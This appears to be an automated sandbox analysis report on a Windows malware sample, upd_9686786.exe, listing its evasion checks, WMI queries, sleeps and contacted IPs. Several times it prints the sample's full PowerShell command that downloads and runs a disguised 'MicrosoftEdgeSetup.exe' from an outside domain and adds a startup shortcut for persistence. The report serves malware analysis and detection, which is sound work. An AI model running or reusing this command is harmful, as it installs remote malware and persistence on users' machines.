Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\upd_9686786.exe Code function: 0_2_00007FF76E651896 rdtsc 0_2_00007FF76E651896
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\upd_9686786.exe Window / User API: threadDelayed 9708 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9909 Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe Window / User API: threadDelayed 9732 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9885
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008 Thread sleep count: 291 > 30 Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008 Thread sleep time: -291000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008 Thread sleep count: 9708 > 30 Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 5008 Thread sleep time: -9708000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5972 Thread sleep count: 9909 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8228 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516 Thread sleep count: 267 > 30 Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516 Thread sleep time: -267000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516 Thread sleep count: 9732 > 30 Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe TID: 8516 Thread sleep time: -9732000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8780 Thread sleep count: 9885 > 30
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: upd_9686786.exe, 00000000.00000002.34844256149.0000022A3F3A5000.00000004.00000020.00020000.00000000.sdmp, upd_9686786.exe, 00000008.00000002.34844597358.0000012EDC445000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: Yes
Source: powershell.exe, 00000009.00000002.30274860324.0000020DF2CF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: upd_9686786.exe, 00000000.00000002.34844538698.0000022A3F5D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.30008936621.0000016F75159000.00000004.00000020.00020000.00000000.sdmp, upd_9686786.exe, 00000008.00000002.34844471247.0000012EDC1E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\upd_9686786.exe Code function: 0_2_00007FF76E651896 rdtsc 0_2_00007FF76E651896
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()" Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c systeminfo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()" Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c systeminfo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "invoke-webrequest -uri \"https://apple-online.shop/microsoftedgesetup.exe\" -outfile \"$env:tmp/microsoftedgesetup.exe\" ; & \"$env:tmp/microsoftedgesetup.exe\" ; $startupfolder = [system.io.path]::combine($env:appdata, 'microsoft\windows\start menu\programs\startup') ; $programpath = 'c:\users\user\desktop\upd_9686786.exe' ; $shortcutname = 'tuygh.lnk' ; $shortcutpath = [system.io.path]::combine($startupfolder, $shortcutname) ; $wshshell = new-object -comobject wscript.shell ; $shortcut = $wshshell.createshortcut($shortcutpath) ; $shortcut.targetpath = $programpath ; $shortcut.workingdirectory = [system.io.path]::getdirectoryname($programpath) ; $shortcut.save()"
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "invoke-webrequest -uri \"https://apple-online.shop/microsoftedgesetup.exe\" -outfile \"$env:tmp/microsoftedgesetup.exe\" ; & \"$env:tmp/microsoftedgesetup.exe\" ; $startupfolder = [system.io.path]::combine($env:appdata, 'microsoft\windows\start menu\programs\startup') ; $programpath = 'c:\users\user\desktop\upd_9686786.exe' ; $shortcutname = 'tuygh.lnk' ; $shortcutpath = [system.io.path]::combine($startupfolder, $shortcutname) ; $wshshell = new-object -comobject wscript.shell ; $shortcut = $wshshell.createshortcut($shortcutpath) ; $shortcut.targetpath = $programpath ; $shortcut.workingdirectory = [system.io.path]::getdirectoryname($programpath) ; $shortcut.save()"
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "invoke-webrequest -uri \"https://apple-online.shop/microsoftedgesetup.exe\" -outfile \"$env:tmp/microsoftedgesetup.exe\" ; & \"$env:tmp/microsoftedgesetup.exe\" ; $startupfolder = [system.io.path]::combine($env:appdata, 'microsoft\windows\start menu\programs\startup') ; $programpath = 'c:\users\user\desktop\upd_9686786.exe' ; $shortcutname = 'tuygh.lnk' ; $shortcutpath = [system.io.path]::combine($startupfolder, $shortcutname) ; $wshshell = new-object -comobject wscript.shell ; $shortcut = $wshshell.createshortcut($shortcutpath) ; $shortcut.targetpath = $programpath ; $shortcut.workingdirectory = [system.io.path]::getdirectoryname($programpath) ; $shortcut.save()" Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "invoke-webrequest -uri \"https://apple-online.shop/microsoftedgesetup.exe\" -outfile \"$env:tmp/microsoftedgesetup.exe\" ; & \"$env:tmp/microsoftedgesetup.exe\" ; $startupfolder = [system.io.path]::combine($env:appdata, 'microsoft\windows\start menu\programs\startup') ; $programpath = 'c:\users\user\desktop\upd_9686786.exe' ; $shortcutname = 'tuygh.lnk' ; $shortcutpath = [system.io.path]::combine($startupfolder, $shortcutname) ; $wshshell = new-object -comobject wscript.shell ; $shortcut = $wshshell.createshortcut($shortcutpath) ; $shortcut.targetpath = $programpath ; $shortcut.workingdirectory = [system.io.path]::getdirectoryname($programpath) ; $shortcut.save()" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1523560 Sample: upd_9686786.exe Startdate: 01/10/2024 Architecture: WINDOWS Score: 60 47 Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE 2->47 49 Sigma detected: Suspicious Invoke-WebRequest Execution 2->49 7 upd_9686786.exe 2->7         started        11 upd_9686786.exe 2->11         started        process3 dnsIp4 39 65.38.120.47 SRS-6-Z-7381US United States 7->39 41 217.148.142.19 PROFESIONALHOSTINGES Romania 7->41 43 65.109.226.176 ALABANZA-BALTUS United States 7->43 51 Suspicious powershell command line found 7->51 13 powershell.exe 14 17 7->13         started        18 cmd.exe 1 7->18         started        20 cmd.exe 1 11->20         started        22 powershell.exe 11->22         started        signatures5 process6 dnsIp7 45 172.67.178.253 CLOUDFLARENETUS United States 13->45 37 C:\Users\user\AppData\Roaming\...\tuygh.lnk, MS 13->37 dropped 55 Powershell creates an autostart link 13->55 24 conhost.exe 13->24         started        26 systeminfo.exe 1 1 18->26         started        29 conhost.exe 18->29         started        31 systeminfo.exe 1 20->31         started        33 conhost.exe 20->33         started        35 conhost.exe 22->35         started        file8 signatures9 process10 signatures11 53 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 26->53
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
65.38.120.47
 unknown United States
7381 SRS-6-Z-7381US false
217.148.142.19
 unknown Romania
200960 PROFESIONALHOSTINGES false
172.67.178.253
 unknown United States
13335 CLOUDFLARENETUS false
65.109.226.176
 unknown United States
11022 ALABANZA-BALTUS false